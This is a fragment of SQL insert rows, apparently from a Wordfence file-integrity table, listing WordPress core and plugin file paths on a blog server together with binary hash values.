('l��SNVng��y�<','wp-includes/blocks/image/theme-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/image/theme-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','djvY#vc|/?�d','�H�7��%��:�����6x�:?ߕ���d�>E','',0,'?'),
('l���s|�����i�+','wp-content/plugins/elementor-pro/assets/css/templates/widget-mega-menu-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/templates/widget-mega-menu-rtl.min.css',0,'�3�ÿ^�\'lRaw��','�3�ÿ^�\'lRaw��','��l��iސ��7���$�ܾ�H�a�0���T�6','',0,'?'),
('l�dc���y���nl���','wp-content/plugins/elementor-pro/assets/js/carousel.9b02b45d7826c1c48f33.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/carousel.9b02b45d7826c1c48f33.bundle.min.js',0,'>xѳCg �E8tJ9�','>xѳCg �E8tJ9�','�a+��%I�C ���k�C��\n\r�r*','',0,'?'),
('l��<��#��q�,�','wp-includes/blocks/archives/editor.css','/var/www/html/ictbank/blog/wp-includes/blocks/archives/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GL�\0��Q���v+s�','\0�B�P��}eGu��6����ؠko��\Z��C�','',0,'?'),
('l�m(f�_q�`b�C�%t','wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presentations/indexable-static-posts-page-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S��Ys�Oz1K!��','�Lt�i]V$I�F��`��>�s\nwa�C�?o','',0,'?'),
('l��14��&y�a��W','wp-includes/css/dist/customize-widgets/style-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/css/dist/customize-widgets/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U��\\0�,L����ҵ',',x����s|BB��F�5τ�i��yMu�','',0,'?'),
('l�z� �]��3�>dD[','wp-content/plugins/wordpress-seo/src/editors/framework/site/term-site-information.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/framework/site/term-site-information.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^�U5���&AR��bc','S�_�40@eL�\"���&�2�:O�tk:�+�','',0,'?'),
('l�G&��3]�(]��/','wp-content/plugins/elementor/core/logger/loggers/base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/logger/loggers/base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[T�;�����4#��|S�','�`��N\\�k4��?��͐)JQ�\Z˃mG\0','',0,'?'),
('l����=\\0Հ�z�','wp-content/plugins/elementor/assets/js/nested-tabs.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/nested-tabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P(����\Z��1��','�����-\"h}3\Zl�8:n�l3Y��LQ*','',0,'?'),
('m)\r����aH���E�','wp-includes/blocks/social-links/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/social-links/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��JU����QK����','�#L̞ϨeS!U�}!C�����I�k��oW>','',0,'?'),
('mD��T�ms���A�}','wp-includes/certificates/ca-bundle.crt','/var/www/html/ictbank/blog/wp-includes/certificates/ca-bundle.crt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UC%Pʅ�$��p���','�<eN����f�FK�F���o�-�Y����SlU�','',0,'?'),
('meD�d� �\n`��','wp-content/plugins/wordpress-seo/src/user-meta/application/custom-meta-collector.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/user-meta/application/custom-meta-collector.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7L�BFA�e\Z?%��j','��z��D�QY),�{��Q���c�Ȏ�S��','',0,'?'),
('m�߄@M��:����','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/Exception/InvalidGrantException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Grant/Exception/InvalidGrantException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5�����8��p�^Z','�\ZZ�v��Ѣ��3kw��9�IO-3ى@�SM','',0,'?'),
('m%+��*]�eUT��c�\0','wp-content/plugins/elementor-pro/modules/floating-buttons/classes/render/contact-buttons-var-5-render.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/classes/render/contact-buttons-var-5-render.php',0,'Y�W§\r�Roi��','Y�W§\r�Roi��','�U�U\\��7L���L0�m�t���!8��,\0`~�','',0,'?'),
('m51��\Zp:�8���\0=','wp-content/plugins/elementor/core/role-manager/role-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/role-manager/role-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�0g��_Fɶ��','�UÈ�½!8<��QL�\"��]��A:�5N�b�','',0,'?'),
('m?s�zx\nXu����','wp-content/uploads/bb-plugin/cache/343-layout-draft.js','/var/www/html/ictbank/blog/wp-content/uploads/bb-plugin/cache/343-layout-draft.js',0,'4�M�I�!�$��','4�M�I�!�$��','�?�4�\"�8�K&oí{svY2��,��;m��|','',0,'?'),
('mA�p�� 1��G�U/','wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ؑ4�䊕�x���1V','\Z|%\0��^��x����\n�?���ֿ�x','',0,'?'),
('mA��Y����Rb|�S�','wp-includes/ms-default-constants.php','/var/www/html/ictbank/blog/wp-includes/ms-default-constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���y���j�0©�_��','r����kEB�f ��p�L���\Z���J','',0,'?'),
('mE���\\�)��o�','wp-includes/js/jquery/ui/spinner.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/spinner.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q��ND���X(*�?','䙨mJ\"��\n��C�Y\r��it\"�uM�_9��%','',0,'?'),
('mHC#-�\'����$�.','wp-content/plugins/elementor/assets/js/common-modules.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/common-modules.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n�.Y�G����T\\','��������t��/s\"S����J�ݣ��h','',0,'?'),
('mI�~�?�V�>,��','wp-content/plugins/elementor-pro/core/editor/promotion.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/editor/promotion.php',0,'h�$*j�Uab��=��Y','h�$*j�Uab��=��Y','P轝�b���A�R��q��$i�ޟd9��','',0,'?'),
('mTZ`xk<Y,��/Ss','wp-includes/class-wpdb.php','/var/www/html/ictbank/blog/wp-includes/class-wpdb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��(-�{���:\\���c','��W[���z�UfiDvs|�^�\r�Vf- b','',0,'?'),
('mW�X6f��`�x�^m','wp-includes/class-wp-classic-to-block-menu-converter.php','/var/www/html/ictbank/blog/wp-includes/class-wp-classic-to-block-menu-converter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n?E\'ѹ.Wm�\r0�S�','/%�Aض�h\0�~@���њ[�~9���F��< �','',0,'?'),
('mY����}ɽ��?','wp-includes/js/jquery/jquery.ui.touch-punch.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/jquery.ui.touch-punch.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L�m�Q4փ��]�','k>jT@���z�����՜.OB�j�0\'��t','',0,'?'),
('ma����xn��','wp-content/plugins/elementor-pro/assets/css/widget-nav-menu.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-nav-menu.min.css',0,'s��+���\n3��h�','s��+���\n3��h�','�������j�2!�h�Q������x0�I �','',0,'?'),
('mize��Kx�ӐM�l�','wp-content/plugins/elementor-pro/modules/theme-builder/conditions/date.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/conditions/date.php',0,'8eң��.�\ZR�;L�','8eң��.�\ZR�;L�','/��)v��<�9o�*��\0A�4�b�*�9^ޘ��l�','',0,'?'),
('moDCN�C>�x����\0','wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-3.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-3.php',0,'��r�w�z�_2��w�','��r�w�z�_2��w�','-5e�ǐ<RRU��&X�SV����c�;����','',0,'?'),
('mry���7FtX\ZD)','wp-content/uploads/2020/02/cropped-ictbank-192x192.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank-192x192.png',0,'��UI�VVԞ&�<��','��UI�VVԞ&�<��','�/��i��r���Zݸ\"�6ݧ��.�͛�\Zf��','',0,'?'),
('m��-\Zm1����w��','wp-includes/js/jquery/ui/sortable.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/sortable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a�ܟ\Z�v�ɶ�_�۞N',')�rAs`�.H�E�B҃yJS#\"� �p','',0,'?'),
('m�4woҿs�wӣ��','wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/revert/templates.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/revert/templates.php',0,'\"X:�uHU�<d~��','\"X:�uHU�<d~��','�[/�}~����{�\0���48�y$��P�05','',0,'?'),
('m��*�R����G�cs@','wp-content/plugins/elementor/includes/widgets/rating.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/rating.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ަ>پ9�V̫gDz��','��XoKp�\r�g=�-h^�(<������\"�Sd','',0,'?'),
('m�5�)\'��aH�\r��-','wp-includes/blocks/home-link/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/home-link/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�(��`�=�~�','f��gm3뜌�����B�D��~q@��5����','',0,'?'),
('m�^\'�Z�xd~���I�','wp-content/plugins/elementor/modules/library/documents/not-supported.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/library/documents/not-supported.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�αsU�G��Zs|^c','��=�yh5�p�j�v+�k����w露��\";','',0,'?'),
('m�2�z�<��@�!��','wp-includes/css/dist/preferences/style-rtl.css','/var/www/html/ictbank/blog/wp-includes/css/dist/preferences/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�kW�G��f�Ct�','g�ӌ�6�Ђ]��[?@�P�Bt�w�}J���','',0,'?'),
('m� �X�4��౪�s�','wp-content/uploads/2020/02/cropped-ictbank-1-100x100.png','/var/www/html/ictbank/blog/wp-content/uploads/2020/02/cropped-ictbank-1-100x100.png',0,'d\Z\0�^9��L�%��','d\Z\0�^9��L�%��','�s��B4�v�U�ԛ)��P�e����[�d�','',0,'?'),
('m�ћx�}�om��v�\"','wp-content/plugins/elementor/assets/lib/nouislider/nouislider.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/nouislider/nouislider.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ݽD��*�<R���[�','xy:����Ly�H��G���\Z��z�қҦ�','',0,'?'),
('m���.��`.U����','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushJavaFX.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/scripts/shBrushJavaFX.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����uR3�[�?��v','~\Z࣬ʿ|�8I7]q��U#���,\'��','',0,'?'),
('m��\\�~bu,��bt','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Client.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�����oV��BY','2ƼΞw�������4ф�C�W�S�g��Q��','',0,'?'),
('nQ��ʒ\'�k��\"%�','wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css','/var/www/html/ictbank/blog/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\r��Π;K�۔�b/�','ߠ�P x�|�ΘQ=� ���Tc�vL\n*Ȱ','',0,'?'),
('n]�j7<3ISsQ�','wp-admin/images/post-formats32-vs.png','/var/www/html/ictbank/blog/wp-admin/images/post-formats32-vs.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t.E���5G�N\Z�v','(Z�,���Im�Y,·�ԗ��tG��������a','',0,'?'),
('n[ X���}�0�','wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LL�#��\0�uD,�Y�i]','�~^���ٴ� d��i*����W����<6��','',0,'?'),
('n����o���Y�J�`','wp-content/plugins/elementor-pro/assets/js/slides.fb6b9afd278bb9c5e75b.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/slides.fb6b9afd278bb9c5e75b.bundle.min.js',0,'�&��*�� ���\0�','�&��*�� ���\0�','DIi��w�f�٭=<D�xu�\Z->��Ɂ��q','',0,'?'),
('n#�t=�\'����b]{�','wp-includes/js/tinymce/themes/modern/theme.min.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/themes/modern/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U���E��|�h(Zf�','ӣ }�ʫ�E�0�).TX��K�d~�H��NlK20','',0,'?'),
('n0�<Pe���y\0.','wp-content/plugins/wordfence/modules/login-security/classes/model/style.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/model/style.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+h�J��N�3�}�{�','{�>�ߓv18g<]\'�E�#\\O����@���','',0,'?'),
('n?��<}rm\'�eq c','wp-includes/blocks/site-title/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/site-title/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<l2|z�|�','�}@�_H��\raP�h����֊�����\'','',0,'?'),
('n@�u��،^�X��X��','wp-content/plugins/elementor-pro/modules/theme-builder/widgets/post-title.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/widgets/post-title.php',0,'}�(��.x�G+m��b','}�(��.x�G+m��b','ߋ��5���>?��5�cМ���a�?���','',0,'?'),
('nAj+�u��VG7d','wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/waf/status-tooltip-learning-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nR1�՞��\n�ixBi','���S�⃧��=ȌbjK�����i�$��y�','',0,'?'),
('nW5{������g����','wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�by�J �!\\','�](K�eҨOӞ�ETb �ߐ_�;��','',0,'?'),
('nYq#��(�H1>ty��','wp-content/plugins/elementor-pro/modules/forms/actions/mailpoet.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/actions/mailpoet.php',0,'x��;��b�@m!��p','x��;��b�@m!��p','DL�\r�^ލpW���~ɢ���b�+�P��_<DJ�','',0,'?'),
('nZ/1T:{&^�/n���','wp-admin/js/media-gallery.js','/var/www/html/ictbank/blog/wp-admin/js/media-gallery.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_8��5o�?�','Ƥ�$�30��I��X��C,b���\"0l�N�F','',0,'?'),
('n[�dma[!`՟}','wp-content/plugins/elementor-pro/assets/js/frontend.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/frontend.min.js',0,'���e�*chR�K�j','���e�*chR�K�j','�X�4�Y#W�} ��&���{��������','',0,'?'),
('n��{��oh\Z��*','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/RejectedPromise.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/promises/src/RejectedPromise.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'��$t���F���f��','n\\G�zO*�bq}=����|)��� ���q�','',0,'?'),
('n����@��A��F�','wp-admin/network/sites.php','/var/www/html/ictbank/blog/wp-admin/network/sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�զ��L\"l�t�t','.��������\"��?j�}3=�d���SK�','',0,'?'),
('n��6�(���@&����','wp-content/themes/hello-elementor/theme.css','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��� �(��plV���','C�Љ�d�;<2�^��-��OL�I���B;S�','',0,'?'),
('n���g�7���xՏ�A','wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-expose-shortlinks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�I?���,PP5�R��','2��0�o��aĐ1rU����)bf�~fxd','',0,'?'),
('n�F�`np~vuTk�K','wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/indexable-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$U��M�hP/�N`�E','G������T�]�0w�_}#�,��M3���#�','',0,'?'),
('n�к���v�nj=ͮ','wp-admin/includes/class-bulk-plugin-upgrader-skin.php','/var/www/html/ictbank/blog/wp-admin/includes/class-bulk-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�%�ͤ�Y�m','�qr�؝��(;2%�`��F6�\Z�w���','',0,'?'),
('n�?q7���\0Z�:0','wp-content/plugins/elementor/assets/images/library-connect/right-1.png','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/library-connect/right-1.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c$����Z�+�.GD/','�8���U�\0��ΠHl~�Y�*��X���a�I','',0,'?'),
('n,�Q���3b��O','wp-includes/js/dist/warning.js','/var/www/html/ictbank/blog/wp-includes/js/dist/warning.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�u�\\j�ƕ�� ','��z�S�<�d+�W�!!r������W�U\\f','',0,'?'),
('n���0�9j�v8�\"','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ef���!77#2A','�Q���O�|R)Vq�C�W���(��@��@+��','',0,'?'),
('n��ۗ��vXH)�','wp-includes/sodium_compat/src/Core32/Curve25519/README.md','/var/www/html/ictbank/blog/wp-includes/sodium_compat/src/Core32/Curve25519/README.md',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y��ϛ�vj��\n���','�S�x�^�V>m�!-�q���D�eV�����','',0,'?'),
('o�P��C�L�6�0��','wp-content/plugins/elementor-pro/modules/posts/data/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/posts/data/controller.php',0,'�k�>���w�8״��','�k�>���w�8״��','�v���h�j6�/�Y�(J�O��V��eӰ3�','',0,'?'),
('o�&�>h�-y���,�','wp-content/uploads/2022/12/HAProxy-High-Availability-100x100.png','/var/www/html/ictbank/blog/wp-content/uploads/2022/12/HAProxy-High-Availability-100x100.png',0,'T���ޠ�c�ձ,�>2','T���ޠ�c�ձ,�>2','�y���P�\\oHvJ:s�EF�0p�v�C �&0','',0,'?'),
('o&�;�;�K��|-%1}3','wp-content/plugins/wordpress-seo/js/dist/installation-success.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/installation-success.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��t�P 1T��N','v���\06ܫ҆!o����Z7]�O$�Py�','',0,'?'),
('o\'RD-��\0���o��','wp-content/plugins/wordfence/images/support.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/support.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Cl�$��r����n<.','��$�M��Ԯ�&���(ᩘs��^ Ϣ*N��','',0,'?'),
('o\'��r+Ԯ�o a','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/SessionCookieJar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"f/�2��|f�b','2e��=�1\n2q�x[H�@�JVV#c[<','',0,'?'),
('o1i�L5���z�$��7','wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u1��\\�8���;#j-','P����|�l�_���Z��3z<NɧK���','',0,'?'),
('oC�\"���Q���t��y','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��+�����%','�4!��H�:�6>�lE��Ec#���a{�A�{','',0,'?'),
('oDL�J�Uv��$��','wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���q��E/�/�b�d�','SЖ�箝&��O�oa�?��@0�,F�F\"��+','',0,'?'),
('oEË�_/���#m�','wp-content/plugins/elementor-pro/assets/css/widget-video-playlist.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-video-playlist.min.css',0,'ZL��?��$�$�L��','ZL��?��$�$�L��','�6`=S@MA��k��D�a��x�����hû','',0,'?'),
('oP�c����o�.�r','wp-includes/js/tinymce/skins/lightgray/img/object.gif','/var/www/html/ictbank/blog/wp-includes/js/tinymce/skins/lightgray/img/object.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�rdP�E}u\n/M�A�� ','��#;!��I��.�>�uʍ�SV��m{|�e-','',0,'?'),
('oS]�~(��7;�\r�','wp-includes/js/dist/shortcode.js','/var/www/html/ictbank/blog/wp-includes/js/dist/shortcode.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E�VGϭ�Te�hꌟ','��f��\Z`[ʟr��~�[ˮ/�L���edK�w','',0,'?'),
('oZ0�������<c�0','wp-includes/SimplePie/IRI.php','/var/www/html/ictbank/blog/wp-includes/SimplePie/IRI.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��9,�zӄycE�','Ye��k����\Zk�t~�n4�&�����p#�Ӝ','',0,'?'),
('of�Gk�L����`t@','wp-includes/blocks/cover/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/cover/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D¾��(�3�CYF��A','Rp��ư<{C�.9�ng�`]g����>&�','',0,'?'),
('ok89�~��nU5�','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-inclusive-language.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-inclusive-language.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����|�yz#��y5','�v,Ba�Ї}b�Hf����۞-2��1�7�','',0,'?'),
('om���p����r���S','wp-content/plugins/elementor/includes/elements/container.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/elements/container.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6I�X�Ԧ���Exn\Z','��jtqww\')��q�Բ��e�O�wd|iB�v','',0,'?'),
('ov�̑���Q����X14','wp-content/plugins/elementor/assets/js/packages/editor/editor.asset.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/editor/editor.asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�L�/��\Zmc��j','�WA+C�N��v\r]�@��8L��]�������','',0,'?'),
('oz�·�ݯ��5a�Q�','wp-content/plugins/wordfence/modules/login-security/css/admin.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/css/admin.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JXlX��+������',':�5J�pż�� ���W�\"��{Ozk','',0,'?'),
('o}1���=(E&RD_��','wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/page-newsletter-landing.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','td@d�3����6z�w','�!��>g�L��]�����d�:ś/�x �Un<�','',0,'?'),
('o}�C܊8�E��G�','wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/scanner/site-cleaning-high-sense.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E8��u�ChG<�o܅\"','�TQ��t���ݓ��z�ωT��0��A','',0,'?'),
('o�<���3!]\Z��','wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/template-types.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/data/endpoints/template-types.php',0,'� @c�]r�\\N�fQv�(','� @c�]r�\\N�fQv�(','����ׯ�Z�<�\ZM�ؿ��r*���-�8��L�','',0,'?'),
('o�{ѱ`�r��<����','wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generators/schema/abstract-schema-piece.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԩ����4~aw���','�\'f��qٟ�ɋ߈<Ew#�o�������','',0,'?'),
('o���� H��ٟ`B ��','wp-content/plugins/wordpress-seo/src/conditionals/user-profile-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/user-profile-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ii�Fc|�+�d�����','�X����/�\"��xMy[ׁ�,�[�\rT��&gh','',0,'?'),
('o��Y\n-(�q��,V�=','wp-content/plugins/elementor-pro/modules/theme-builder/skins/posts-archive-skin-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/skins/posts-archive-skin-base.php',0,'�+3q�:�P��\"7','�+3q�:�P��\"7','va5<�D����%�R΄�����`ؠ�L','',0,'?'),
('o� ǻ� &��c���','wp-includes/blocks/paragraph/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/paragraph/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"a\' b+�0ԙ«��O','�����(w���m¤�b�\Z:���7�=�1��','',0,'?'),
('o�n�5�Z�hF�','wp-content/plugins/elementor/app/modules/import-export/runners/import/import-runner-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/import-export/runners/import/import-runner-base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$�C_��g&V���/ ','�0 �غX��]�Et�\\3�[VT��n\\��(�','',0,'?'),
('o�Z��u����on','wp-content/plugins/elementor-pro/modules/social/widgets/facebook-comments.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/social/widgets/facebook-comments.php',0,'[�V\0���Rsرs*o','[�V\0���Rsرs*o','G��f�7\0O��ID7���V�f���\0M�9��','',0,'?'),
('o�w*�\nΛGҜ�]','wp-content/plugins/wordfence/modules/login-security/img/header.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/img/header.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p����]�j-����','8�����#̄(8��O�\"� +h\"Fb��','',0,'?'),
